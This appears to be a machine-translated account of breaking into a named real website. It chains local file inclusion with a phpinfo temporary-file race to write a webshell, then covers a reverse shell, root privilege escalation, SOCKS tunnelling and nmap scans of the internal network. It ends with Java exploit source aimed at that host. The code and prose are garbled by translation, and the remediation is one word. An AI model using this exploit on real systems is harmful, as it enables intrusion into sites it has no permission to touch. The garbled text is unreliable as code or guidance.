A simple internal network penetration is included in an interesting file on a site under the chain home (getshell is included in local files)

A simple internal network penetration is included in an interesting file on a site under the chain home (getshell is included in local files)

Should there be no similar cases in the past?

One day, the partner in the group lost a link:

Http://price.ziroom.com /? _ P =.../../etc/passwd000000.html

Local file inclusion exists, and the upload function is available. How can this problem be solved?

First, I felt excited. I had been trying to make such an instance for a long time ago. I had never been able to do so because I had not found such a harsh environment.

We all know that a temporary file will be generated when a form-data request is submitted to any PHP file on the server. If we can directly include a temporary file, we can execute arbitrary code, however, you must know the path and name of the temporary file.

I had to admire the ideas of the foreign fund. They found that the path and name of the temporary file can be obtained through phpinfo. With the path and name, we can directly include and execute arbitrary code.

Another problem here is that the generated temporary files will be deleted in a very short time, so what we need to do is compete! Include it before deletion.

To compete, you must spend time on code execution efficiency, use two while loops, and the second while to compete with the core. At the same time, you must increase the time for deleting temporary files, that is to say, when a large number of data packets are submitted, the cached file is large enough, and the deletion time will be relatively high, the probability of competition will be greater. After knowing the principle, I used JAVA to write an application. Why should I select JAVA? Because JAVA's execution efficiency is second only to C.



Condition of exploits:

1. You need to know the phpinfo path;

2. The website has the File Inclusion Vulnerability;

3. There are drive letters in Windows. Linux does not exist in the tree-like form based on the root directory. Therefore, the Use Conditions of Windows are harsh, that is, the remote inclusion of drive letters can be specified, or the tmp file and the web directory can be used only on the same drive letter.



After knowing the principle, you can use a program to test it.
 

The prompt "no permission" indicates that the root directory has no permission to write data. After scanning the directory, a cache directory is found, which can be written based on experience.
 

Webshell is written successfully.
 

Intranet penetration is physical activity. Because ids, firewalls, and other devices are installed in the network segment, the penetration time is greatly extended.

The port should be a unified strategy on the device, and common intranet penetration tools such as reGeorg, Tunna, and ipvh cannot be used. metasploit will also fall from time to time. It seems that it can only extract the sSocks, we recommend that you use sSocks if you have limits.

Bounce SHELL, kernel privilege escalation to ROOT, sSocks installed, found not as a scan of metasploit dropped.
 

 

 

 

Although the route table of the local machine is 172.16.5.0/24, I found that other network segments can be accessed by searching for previous vulnerabilities in the company. The approximate range is 172.165.0.0/21. Proxychains upgraded proxychains4 is used in combination with nmap to detect the Intranet. Although metasploit is not convenient, this method is also the only method in this environment.
 

Intranet penetration is relatively simple. If the time is limited, it will not be described in detail.
 

 

 

 

Package com. ms509; import java. io. inputStream; import java. io. printWriter; import java.net. inetAddress; import java.net. socket; import java.net. URL; import java. util. imports; import java. util. regex. matcher; import java. util. regex. pattern; public class PhpLfi {/*** @ author Chora [ms509] * @ param string webshell wants to generate the webshell path * @ param string host address * @ param string include File Inclusion Vulnerability path * @ param string phpin Address of the fophpinfo page * @ paramintport host port * @ paramintpaddingnum fill size */public static void main (String [] args) throws Exception {// TODO Auto-generated method stubString webshell = "/cache/wy. php "; String host =" price.ziroom.com "; String include =" http://price.ziroom.com /? _ P = .. /.. /.. /.. /.. /.. /.. /.20.include0000000000.html "; String phpinfo ="/phpinfo. php "; int port = 80; int paddingnum = 8000; String padding =" "; String phptmp; String url; String tmp; for (int I = 0; I
 
  
{Padding = padding + "A";} InetAddress inethost = InetAddress. getByName (host); StringBuffer sb = new StringBuffer (); StringBuffer sb2 = new StringBuffer (); sb2.append ("Listen 7dbff1ded0714 \ r \ n"); sb2.append ("Content-Disposition: form-data; name = \ "ms509 \"; filename = \ "wooyun.txt \" \ r \ n "); sb2.append (" Content-Type: text/plain \ r \ n "); sb2.append (" \ r \ n "); sb2.append ("
  ')? Print ('ms509 _ true'): print ('ms509 _ false')?> "); Sb2.append (" \ r \ n "); sb2.append (" ----------------------------- 7dbff1ded0714 "); sb. append (" POST "+ phpinfo + "? A = "+ padding +" HTTP/1.1 \ r \ n "); sb. append ("Cookie: PHPSESSID = f90b76b7840c05076ca235b05f1c4564; ms509cookie =" + padding + "\ r \ n"); sb. append ("Accept:" + padding + "\ r \ n"); sb. append ("User-agent:" + padding + "\ r \ n"); sb. append ("Accept-Language:" + padding + "\ r \ n"); sb. append ("Pragma:" + padding + "\ r \ n"); sb. append ("Content-Type: multipart/form-data; boundary = --------------------------- 7dbff1ded0714 \ r \ n"); sb. append ("Conte Nt-Length: "+ String. valueOf (sb2.length () + "\ r \ n"); sb. append ("Host:" + host + "\ r \ n"); sb. append (sb2); String sbs = sb. toString (); // System. out. println (sb. toString (); while (true) {Socket socket = new Socket (inethost, port); PrintWriter out = new PrintWriter (socket. getOutputStream (); out. write (sbs); out. flush (); String data = ""; while (data. indexOf ("") <0) {data = PhpLfi. getData (socket. getInputStream (); phptmp = PhpLfi. getPhptmp (data); if (phptmp! = Null) {url = include. replaceFirst ("\\{ include}", phptmp); tmp = PhpLfi. doGet (url); System. out. println (url); if (tmp. indexOf ("ms509_true")>-1) {System. out. println ("webshell is up! \ R \ nwebshell is http: // "+ host +": "+ port + webshell); System. exit (0);} else if (tmp. indexOf ("ms509_false")>-1) {System. out. println ("webshell up error! \ R \ nreason: \ r \ n "+ tmp); System. exit (0);} System. out. println (tmp) ;}} socket. close () ;}} public static String getData (InputStream is) throws Exception {int byteAva = is. available (); String data = ""; if (byteAva> 0) {byte [] tmp2 = new byte [byteAva]; is. read (tmp2); data = new String (tmp2);} return data;} public static String getPhptmp (String data) {String tmp = null; Matcher m = Pattern. compile ("\ [tmp_name] =>\\ s (. *?) \ S "). matcher (data); if (m. find () {tmp = m. group (1) ;}return tmp ;}public static String doGet (String url) {String data = ""; try {URL u = new URL (url ); inputStream in = u. openStream (); iterator = new iterator (in); while (iterator. hasNextLine () {data + = bytes. nextLine () + "\ r \ n" ;}} catch (Exception e) {// TODO Auto-generated catch blockdata = "error" ;}return data ;}}
 

 

Solution:

Filter